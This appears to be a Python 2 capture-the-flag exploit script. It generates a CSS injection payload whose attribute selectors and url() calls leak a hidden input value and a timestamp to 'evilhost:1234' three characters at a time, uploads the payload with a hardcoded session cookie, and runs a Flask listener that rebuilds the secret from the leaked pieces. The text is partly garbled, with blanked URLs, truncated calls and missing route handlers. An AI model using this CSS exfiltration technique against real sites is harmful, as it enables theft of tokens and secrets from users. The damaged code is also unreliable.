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Created December 22, 2019 11:03
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import time
import requests
host = 'evilhost:1234'
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'
frames = '''button{animation:l1 35s;}
@keyframes l1{%s}'''
lines1 = []
lines2 = []
for i in xrange(1024):
lines1.append('%s%%{content:var(--p%s);list-style-image:var(--p%s);border-image:var(--p%s);background-image:var(--p%s)}'%(i*0.08, i, i+1024, i+1024*2, i+1024*3))
frames = frames%('\n'.join(lines1))#, '\n'.join(lines2))
start_time = int(time.time())
css = []
for i in xrange(start_time, start_time+300):
css.append(timestamp_template%(i, i))
for i in xrange(256):
css.append(start_template%(i, i))
for i in xrange(4096):
css.append(triple_template%(i, i, i))
css = '\n'.join(css) + '\n' + frames
print len(css)
print'', files={'file': css}, cookies={'connect.sid': 's%3AUHWeBRChwL8RHqmvMZYOECT0O7vDJI4E.v5goWO%2Bvku0BFEpgqxVvqoB0POnXUdpCLEnTDudmJvE'}).content
from flask import Flask, redirect, url_for, render_template, request
from uuid import uuid4
app = Flask(__name__)
import copy
import requests
triples = set()
start = None
timestamp = None
def try_secret(s):
print requests.get(''%(s, timestamp, 1)).content
def restore(s, triples):
if len(triples) == 0:
for i in xrange(len(triples)):
if triples[i][:2] == s[-2:]:
res = s + triples[i][-1]
loc_triples = copy.copy(triples)
restore(res, loc_triples)
def calc():
restore(start, list(triples))
def get_triple(trp):
print len(triples)
if len(triples) == 62 and start and timestamp:
return 'OK'
def get_timestamp(timestamp_):
global timestamp
timestamp = int(timestamp_)
if len(triples) == 62 and start and timestamp:
return 'OK'
def get_start(start_):
global start
start = start_
if len(triples) == 62 and start and timestamp:
return 'OK'
if __name__ == "__main__":'', port=1234, threaded=True)
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